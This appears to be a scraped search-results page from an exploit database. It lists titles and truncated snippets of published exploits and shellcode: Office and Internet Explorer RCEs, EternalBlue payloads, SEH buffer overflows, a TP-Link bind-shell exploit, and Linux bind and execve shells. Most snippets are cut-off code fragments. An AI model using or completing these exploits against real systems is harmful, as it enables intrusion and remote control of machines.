7258 matches found
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 Exploit CVE-2017-11882 Exploit accepts over 17...
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft
CVE-2017-11882 43b The original script comes from https://git...
Excalibur - An Eternalblue exploit payload based Powershell
Excalibur is an Eternalblue exploit based "Powershell" for the Bashbunny project. Its purpose is to reflect on how a "simple" USB drive can execute the 7 cyber kill chain. Excalibur may be used for demonstration purposes only, and the developers are not responsible for any misuse or illegal...
VX Search 10.2.14 - Proxy Local Buffer Overflow (SEH)
VX Search 10.2.14 - Proxy Local Buffer Overflow SEH !/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version :...
Dup Scout Enterprise 10.0.18 Buffer Overflow
Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser parser.addargument'--host', required=True args =...
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...
Jnes 1.0.2 - Stack Buffer Overflow
Jnes 1.0.2 - Stack Buffer Overflow !/usr/bin/env python coding: utf-8 Exploit Title: Jnes Version 1.0.2 Stack Buffer Overflow Date: 3-11-2017 Exploit Author: crashmanucoot Contact: twitter.com/crashmanucoot Vendor Homepage: http://www.jabosoft.com/home Software Link:...
ASLRay - Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying
Linux ELF x32 and x64 ASLR bypass exploit with stack-spraying. Properties: ASLR bypass Cross-platform Minimalistic Simplicity Unpatchable Dependencies: Linux 2.6.12+ - will work on any x86-64 Debian-based OS BASH - the whole script Limitations: Stack needs to be executable -z execstack Binary has...
DameWare Remote Controller 12.0.0.520 Remote Code Execution
Exploit Title: Dameware Remote Controller RCE Date: 3-04-2016 Exploit Author: Securifera Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx Version: 12.0.0.520 Website:...
TP-Link WR940N - Authenticated Remote Code Exploit
Exploit for hardware platform in category web applications import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can...
Apple iOS 10.2 (14C92) - Remote Code Execution Exploit
Exploit for iOS platform in category remote exploits Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317c3 The exploit achieves R/W access to the host's physical memory. This exploit has been tested on the iPhone 7, iOS 10.2 14C92. To run the exploit against different devices o...
TP-Link WR940N - (Authenticated) Remote Code
import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in the code if you wish\n" "This exploit require...
Apple iOS 10.2 (14C92) - Remote Code Execution
Apple iOS 10.2 14C92 - Remote Code Execution Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1317c3 The exploit achieves R/W access to the host's physical memory. This exploit has been tested on the iPhone 7, iOS 10.2 14C92. To run the exploit against different devices or...
Windows/x64 - API Hooking Shellcode (117 bytes)
/ Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : email protected Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks DeleteFileW API Warning: Do not use this Shellcode on explorer.exe Otherwise You won't be able to...
Microsoft Internet Explorer 11 (Windows 7 x86) - 'mshtml.dll' Remote Code Execution (MS17-007)
.class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; var ntdllBase = ""; function infoleak var textarea = document.getElementById"textarea"; var frame = document.createElement"iframe"; textarea.appendChildframe;...
TP-Link WR940N - (Authenticated) Remote Code
TP-Link WR940N - Authenticated Remote Code import urllib2 import base64 import hashlib from optparse import import sys import urllibbanner = "\n" "WR940N Authenticated Remote Code Exploit\n" "This exploit will open a bind shell on the remote target\n" "The port is 31337, you can change that in th...
Windows x64 - API Hooking Shellcode (117 bytes)
Windows x64 - API Hooking Shellcode 117 bytes. Shellcode exploit for Winx86-64 platform / Title : Windows x64 API Hooking Shellcode Author : Roziul Hasan Khan Shifat Size : 117 bytes Date : 16/10/2017 Email : [email protected] Tested On : Windows 7 Ultimate x64 / / This Shellcode hooks...
drinkme - Shellcode Testing Harness
drinkme is a shellcode test harness. It reads shellcode from stdin and executes it. This allows pentesters to quickly test their payloads before deployment. Formats drinkme can handle shellcode in the following formats: "0x" "\x" "x" "" For example, NOP could be represented as any of "0x90",...
Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)
/ Title: Linux/x86 - Polymorphic execve /bin/sh x86 shellcode - 30 bytes Author: Manuel Mancera @sinkmanu Tested on: Linux 3.16.0-4-586 1 Debian 3.16.43-2+deb8u2 2017-06-26 i686 GNU/Linux ----------------- Assembly code ------------------- global start section .text start: xor eax, eax push eax m...